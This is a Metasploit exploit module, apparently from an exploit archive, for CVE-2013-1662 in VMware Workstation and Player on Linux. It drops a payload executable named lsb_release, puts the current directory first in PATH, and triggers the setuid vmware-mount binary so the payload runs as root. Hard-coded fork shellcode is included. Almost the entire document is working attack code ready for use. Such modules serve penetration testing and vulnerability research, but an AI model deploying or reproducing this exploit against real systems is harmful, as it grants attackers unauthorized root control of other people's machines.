
VMWare Setuid vmware-mount Unsafe popen(3)

Posted on 29 August 2013

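##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

# Local privilege-escalation module for CVE-2013-1662 (VMSA-2013-0010).
#
# The setuid vmware-mount binary runs `lsb_release` through popen(3), which
# resolves the program name via the caller-controlled PATH. The module writes
# a payload executable named lsb_release into the session's current
# directory and runs vmware-mount with "." prepended to PATH so that the
# payload is the binary found first.
class Metasploit4 < Msf::Exploit::Local
  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File

  # Absolute path of the setuid binary that is checked and then invoked.
  VMWARE_MOUNT = "/usr/bin/vmware-mount"

  # 32-bit x86 machine code for `if(fork()) exit(0);`, prepended to the
  # payload so the parent returns to vmware-mount immediately. Only valid
  # for 'Arch' => ARCH_X86, which is the sole architecture declared below.
  #
  #   6A02   push byte +0x2
  #   58     pop eax
  #   CD80   int 0x80      ; fork
  #   85C0   test eax,eax
  #   7406   jz 0xf
  #   31C0   xor eax,eax
  #   B001   mov al,0x1
  #   CD80   int 0x80      ; exit
  FORK_STUB = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80"

  # Registers module metadata (name, description, references, default
  # options) and removes the PrependFork option, which is replaced by
  # FORK_STUB above.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info, {
      'Name'           => 'VMWare Setuid vmware-mount Unsafe popen(3)',
      'Description'    => %q{
        VMWare Workstation (up to and including 9.0.2 build-1031769) and
        Player have a setuid executable called vmware-mount that invokes
        lsb_release in the PATH with popen(3). Since PATH is
        user-controlled, and the default system shell on Debian-derived
        distributions does not drop privs, we can put an arbitrary payload
        in an executable called lsb_release and have vmware-mount happily
        execute it as root for us.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Tavis Ormandy', # Vulnerability discovery and PoC
        'egypt'          # Metasploit module
      ],
      'Platform'       => [ 'linux' ],
      'Arch'           => ARCH_X86,
      'Targets'        => [
        [ 'Automatic', { } ],
      ],
      'DefaultOptions' => {
        "PrependSetresuid" => true,
        "PrependSetresgid" => true,
      },
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'References'     => [
        [ 'CVE', '2013-1662' ],
        [ 'OSVDB', '96588' ],
        [ 'BID', '61966' ],
        [ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
        [ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
      ],
      'DisclosureDate' => "Aug 22 2013"
    }))

    # Handled by ghetto hardcoding below (see FORK_STUB).
    deregister_options("PrependFork")
  end

  # Reports Vulnerable when VMWARE_MOUNT exists on the target with the
  # setuid bit set, Safe otherwise. No version check is performed, so a
  # patched build that is still setuid is reported as Vulnerable.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    setuid?(VMWARE_MOUNT) ? CheckCode::Vulnerable : CheckCode::Safe
  end

  # Stages the payload as ./lsb_release, runs vmware-mount with "." first
  # in PATH, then removes the staged file.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when check is not Vulnerable
  def exploit
    unless check == CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
    end

    # Ghetto PrependFork action which is apparently only implemented for
    # Meterpreter.
    # XXX Put this in a mixin somewhere
    exe = generate_payload_exe(:code => FORK_STUB + payload.encoded)

    # The file is written relative to the session's current working
    # directory, which is the same directory prepended to PATH below;
    # both must refer to the same place for the lookup to succeed.
    write_file("lsb_release", exe)
    cmd_exec("chmod +x lsb_release")
    cmd_exec("PATH=.:$PATH #{VMWARE_MOUNT}")

    # Delete it here instead of using FileDropper because the original
    # session can clean it up
    cmd_exec("rm -f lsb_release")
  end

  # True when +remote_file+ exists on the target and has the setuid bit
  # set, as reported by `test -u` in the session's shell.
  #
  # @param remote_file [String] absolute path on the target
  # @return [Boolean]
  def setuid?(remote_file)
    # The path argument is interpolated rather than ignored, so callers
    # other than check can probe a different binary.
    cmd_exec("test -u #{remote_file} && echo true").to_s.include?("true")
  end
end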

 
